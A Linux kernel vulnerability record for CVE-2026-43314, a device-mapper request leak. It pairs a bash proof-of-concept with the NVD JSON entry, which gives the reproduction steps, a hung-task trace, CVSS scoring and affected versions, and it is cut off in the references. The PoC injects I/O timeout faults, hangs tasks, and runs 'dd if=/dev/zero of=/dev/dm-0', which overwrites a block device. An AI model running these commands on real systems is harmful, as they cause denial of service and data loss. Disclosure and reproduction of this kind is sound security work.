CVE-2026-43314

#!/bin/bash # PoC for CVE-2026-43314: Linux Kernel dm driver request leak # This script demonstrates the reproduction steps provided in the vulnerability report. # Note: This requires root privileges and specific kernel configuration (debugfs, fault injection). # 1. Setup: Ensure dm device (e.g., dm-0) with iscsi slave exists. # 2. Inject io-timeout-fail to dm device echo 1 > /sys/class/block/dm-0/io-timeout-fail echo 100 > /sys/kernel/debug/fail_io_timeout/probability echo 10 > /sys/kernel/debug/fail_io_timeout/times # 3. Trigger I/O operations on the dm device dd if=/dev/dm-0 of=/dev/null bs=1k count=1 & dd if=/dev/zero of=/dev/dm-0 bs=1k count=1 & # 4. Trigger the hang scenario by unbinding the iscsi session iscsiadm -m node -u # Result: The system may hang tasks waiting for I/O completion.

{"cve": {"id": "CVE-2026-43314", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:39.830", "lastModified": "2026-05-15T17:07:54.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: remove fake timeout to avoid leak request\n\nSince commit 15f73f5b3e59 (\"blk-mq: move failure injection out of\nblk_mq_complete_request\"), drivers are responsible for calling\nblk_should_fake_timeout() at appropriate code paths and opportunities.\n\nHowever, the dm driver does not implement its own timeout handler and\nrelies on the timeout handling of its slave devices.\n\nIf an io-timeout-fail error is injected to a dm device, the request\nwill be leaked and never completed, causing tasks to hang indefinitely.\n\nReproduce:\n1. prepare dm which has iscsi slave device\n2. inject io-timeout-fail to dm\n echo 1 >/sys/class/block/dm-0/io-timeout-fail\n echo 100 >/sys/kernel/debug/fail_io_timeout/probability\n echo 10 >/sys/kernel/debug/fail_io_timeout/times\n3. read/write dm\n4. iscsiadm -m node -u\n\nResult: hang task like below\n[ 862.243768] INFO: task kworker/u514:2:151 blocked for more than 122 seconds.\n[ 862.244133] Tainted: G E 6.19.0-rc1+ #51\n[ 862.244337] \"echo 0 > /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 862.244718] task:kworker/u514:2 state:D stack:0 pid:151 tgid:151 ppid:2 task_flags:0x4288060 flags:0x00080000\n[ 862.245024] Workqueue: iscsi_ctrl_3:1 __iscsi_unbind_session [scsi_transport_iscsi]\n[ 862.245264] Call Trace:\n[ 862.245587] <TASK>\n[ 862.245814] __schedule+0x810/0x15c0\n[ 862.246557] schedule+0x69/0x180\n[ 862.246760] blk_mq_freeze_queue_wait+0xde/0x120\n[ 862.247688] elevator_change+0x16d/0x460\n[ 862.247893] elevator_set_none+0x87/0xf0\n[ 862.248798] blk_unregister_queue+0x12e/0x2a0\n[ 862.248995] __del_gendisk+0x231/0x7e0\n[ 862.250143] del_gendisk+0x12f/0x1d0\n[ 862.250339] sd_remove+0x85/0x130 [sd_mod]\n[ 862.250650] device_release_driver_internal+0x36d/0x530\n[ 862.250849] bus_remove_device+0x1dd/0x3f0\n[ 862.251042] device_del+0x38a/0x930\n[ 862.252095] __scsi_remove_device+0x293/0x360\n[ 862.252291] scsi_remove_target+0x486/0x760\n[ 862.252654] __iscsi_unbind_session+0x18a/0x3e0 [scsi_transport_iscsi]\n[ 862.252886] process_one_work+0x633/0xe50\n[ 862.253101] worker_thread+0x6df/0xf10\n[ 862.253647] kthread+0x36d/0x720\n[ 862.254533] ret_from_fork+0x2a6/0x470\n[ 862.255852] ret_from_fork_asm+0x1a/0x30\n[ 862.256037] </TASK>\n\nRemove the blk_should_fake_timeout() check from dm, as dm has no\nnative timeout handling and should not attempt to fake timeouts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-772"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.31", "versionEndExcluding": "5.10.252", "matchCriteriaId": "790A3A0E-E329-48DE-816C-2EDD7B22E08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4f9e7ca933 ... (truncated)